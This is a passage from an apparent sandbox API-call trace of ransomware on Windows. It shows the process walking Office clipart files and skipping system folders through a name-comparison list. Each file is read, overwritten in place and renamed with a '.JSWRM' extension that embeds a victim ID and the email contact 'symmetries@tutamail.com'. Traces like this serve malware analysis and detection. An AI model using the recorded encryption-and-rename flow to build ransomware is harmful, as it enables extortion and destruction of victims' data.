lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0xa340, lpOverlapped=0x0) returned 1 [0095.211] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0095.211] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0xa340, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0xa340, lpOverlapped=0x0) returned 1 [0095.211] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0095.212] CloseHandle (hObject=0x314) returned 1 [0095.212] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210618 [0095.212] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0095.212] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0095.212] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0095.212] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0095.212] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0095.212] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0095.212] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a450 [0095.212] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a450, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0095.212] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a450 | out: hHeap=0x1e0000) returned 1 [0095.212] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cea0 [0095.212] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x248058 [0095.212] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cea0 | out: hHeap=0x1e0000) returned 1 [0095.212] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0095.212] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH03205I.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph03205i.jpg"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH03205I.JPG.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph03205i.jpg.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0095.213] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x248058 | out: hHeap=0x1e0000) returned 1 [0095.213] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210618 | out: hHeap=0x1e0000) returned 1 [0095.213] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210c08 | out: hHeap=0x1e0000) returned 1 [0095.213] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x102c771c, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x102c771c, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x102c771c, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xa445, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="PH03224I.JPG", cAlternateFileName="")) returned 1 [0095.213] lstrcmpiW (lpString1="PH03224I.JPG", lpString2=".") returned 1 [0095.213] lstrcmpiW (lpString1="PH03224I.JPG", lpString2="..") returned 1 [0095.213] lstrcmpiW (lpString1="PH03224I.JPG", lpString2="...") returned 1 [0095.213] lstrcmpiW (lpString1="PH03224I.JPG", lpString2="windows") returned -1 [0095.213] lstrcmpiW (lpString1="PH03224I.JPG", lpString2="recovery") returned -1 [0095.213] lstrcmpiW (lpString1="PH03224I.JPG", lpString2="perflogs") returned 1 [0095.213] lstrcmpiW (lpString1="PH03224I.JPG", lpString2="documents and settings") returned 1 [0095.213] lstrcmpiW (lpString1="PH03224I.JPG", lpString2="$RECYCLE.BIN") returned 1 [0095.213] lstrcmpiW (lpString1="PH03224I.JPG", lpString2="system volume information") returned -1 [0095.213] lstrcmpiW (lpString1="PH03224I.JPG", lpString2="msocache") returned 1 [0095.213] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241358 [0095.213] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PH03224I.JPG", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0095.213] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PH03224I.JPG", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PH03224I.JPG", lpUsedDefaultChar=0x0) returned 12 [0095.213] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241358 | out: hHeap=0x1e0000) returned 1 [0095.213] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0095.213] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PH03224I.JPG", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0095.213] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PH03224I.JPG", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PH03224I.JPG", lpUsedDefaultChar=0x0) returned 12 [0095.213] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0095.213] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2107e0 [0095.213] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210b70 | out: hHeap=0x1e0000) returned 1 [0095.213] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0095.213] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0095.214] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210580 [0095.214] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH03224I.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph03224i.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0095.214] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=42053) returned 1 [0095.214] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0095.215] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa440) returned 0x24d210 [0095.215] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0xa440, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0xa440, lpOverlapped=0x0) returned 1 [0095.220] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0095.220] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0xa440, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0xa440, lpOverlapped=0x0) returned 1 [0095.220] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0095.221] CloseHandle (hObject=0x314) returned 1 [0095.221] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2100c0 [0095.221] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0095.221] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0095.221] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0095.221] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0095.221] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0095.221] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0095.221] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1c8 [0095.221] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1c8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0095.221] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1c8 | out: hHeap=0x1e0000) returned 1 [0095.221] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cca8 [0095.221] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2477a0 [0095.221] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cca8 | out: hHeap=0x1e0000) returned 1 [0095.221] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0095.222] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH03224I.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph03224i.jpg"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH03224I.JPG.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph03224i.jpg.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0095.222] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2477a0 | out: hHeap=0x1e0000) returned 1 [0095.222] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2100c0 | out: hHeap=0x1e0000) returned 1 [0095.222] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210580 | out: hHeap=0x1e0000) returned 1 [0095.222] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x102a14ae, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x102a14ae, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x102c771c, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x2ba2, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="PH03379I.JPG", cAlternateFileName="")) returned 1 [0095.222] lstrcmpiW (lpString1="PH03379I.JPG", lpString2=".") returned 1 [0095.222] lstrcmpiW (lpString1="PH03379I.JPG", lpString2="..") returned 1 [0095.222] lstrcmpiW (lpString1="PH03379I.JPG", lpString2="...") returned 1 [0095.222] lstrcmpiW (lpString1="PH03379I.JPG", lpString2="windows") returned -1 [0095.222] lstrcmpiW (lpString1="PH03379I.JPG", lpString2="recovery") returned -1 [0095.223] lstrcmpiW (lpString1="PH03379I.JPG", lpString2="perflogs") returned 1 [0095.223] lstrcmpiW (lpString1="PH03379I.JPG", lpString2="documents and settings") returned 1 [0095.223] lstrcmpiW (lpString1="PH03379I.JPG", lpString2="$RECYCLE.BIN") returned 1 [0095.223] lstrcmpiW (lpString1="PH03379I.JPG", lpString2="system volume information") returned -1 [0095.223] lstrcmpiW (lpString1="PH03379I.JPG", lpString2="msocache") returned 1 [0095.223] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241290 [0095.223] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PH03379I.JPG", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0095.223] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PH03379I.JPG", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PH03379I.JPG", lpUsedDefaultChar=0x0) returned 12 [0095.223] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241290 | out: hHeap=0x1e0000) returned 1 [0095.223] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241218 [0095.223] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PH03379I.JPG", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0095.223] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PH03379I.JPG", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PH03379I.JPG", lpUsedDefaultChar=0x0) returned 12 [0095.223] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241218 | out: hHeap=0x1e0000) returned 1 [0095.223] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2106b0 [0095.223] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2107e0 | out: hHeap=0x1e0000) returned 1 [0095.223] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0095.223] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0095.223] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210450 [0095.223] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH03379I.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph03379i.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0095.224] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=11170) returned 1 [0095.224] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0095.224] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2ba0) returned 0x24d210 [0095.224] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x2ba0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x2ba0, lpOverlapped=0x0) returned 1 [0095.227] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0095.227] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x2ba0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x2ba0, lpOverlapped=0x0) returned 1 [0095.227] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0095.227] CloseHandle (hObject=0x314) returned 1 [0095.227] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210c08 [0095.227] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0095.227] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0095.227] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0095.227] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0095.227] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0095.227] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0095.227] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a498 [0095.227] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a498, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0095.227] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a498 | out: hHeap=0x1e0000) returned 1 [0095.227] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cf48 [0095.227] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247b80 [0095.227] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cf48 | out: hHeap=0x1e0000) returned 1 [0095.227] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0095.227] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH03379I.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph03379i.jpg"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH03379I.JPG.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph03379i.jpg.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0095.228] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247b80 | out: hHeap=0x1e0000) returned 1 [0095.228] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210c08 | out: hHeap=0x1e0000) returned 1 [0095.228] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210450 | out: hHeap=0x1e0000) returned 1 [0095.228] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x102c771c, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x102c771c, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x102c771c, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x321f, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="PH03380I.JPG", cAlternateFileName="")) returned 1 [0095.228] lstrcmpiW (lpString1="PH03380I.JPG", lpString2=".") returned 1 [0095.228] lstrcmpiW (lpString1="PH03380I.JPG", lpString2="..") returned 1 [0095.228] lstrcmpiW (lpString1="PH03380I.JPG", lpString2="...") returned 1 [0095.228] lstrcmpiW (lpString1="PH03380I.JPG", lpString2="windows") returned -1 [0095.228] lstrcmpiW (lpString1="PH03380I.JPG", lpString2="recovery") returned -1 [0095.228] lstrcmpiW (lpString1="PH03380I.JPG", lpString2="perflogs") returned 1 [0095.229] lstrcmpiW (lpString1="PH03380I.JPG", lpString2="documents and settings") returned 1 [0095.229] lstrcmpiW (lpString1="PH03380I.JPG", lpString2="$RECYCLE.BIN") returned 1 [0095.229] lstrcmpiW (lpString1="PH03380I.JPG", lpString2="system volume information") returned -1 [0095.229] lstrcmpiW (lpString1="PH03380I.JPG", lpString2="msocache") returned 1 [0095.229] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0095.229] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PH03380I.JPG", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0095.229] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PH03380I.JPG", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PH03380I.JPG", lpUsedDefaultChar=0x0) returned 12 [0095.229] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0095.229] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241308 [0095.229] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PH03380I.JPG", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0095.229] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PH03380I.JPG", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PH03380I.JPG", lpUsedDefaultChar=0x0) returned 12 [0095.229] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241308 | out: hHeap=0x1e0000) returned 1 [0095.229] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2100c0 [0095.229] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2106b0 | out: hHeap=0x1e0000) returned 1 [0095.229] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0095.229] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0095.229] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210c08 [0095.229] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH03380I.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph03380i.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0095.230] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=12831) returned 1 [0095.230] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0095.230] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x3210) returned 0x24d210 [0095.230] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x3210, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x3210, lpOverlapped=0x0) returned 1 [0095.232] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0095.232] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x3210, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x3210, lpOverlapped=0x0) returned 1 [0095.233] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0095.233] CloseHandle (hObject=0x314) returned 1 [0095.233] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210910 [0095.233] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0095.233] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0095.233] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0095.233] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0095.233] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0095.233] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0095.233] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a4b0 [0095.233] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a4b0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0095.233] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a4b0 | out: hHeap=0x1e0000) returned 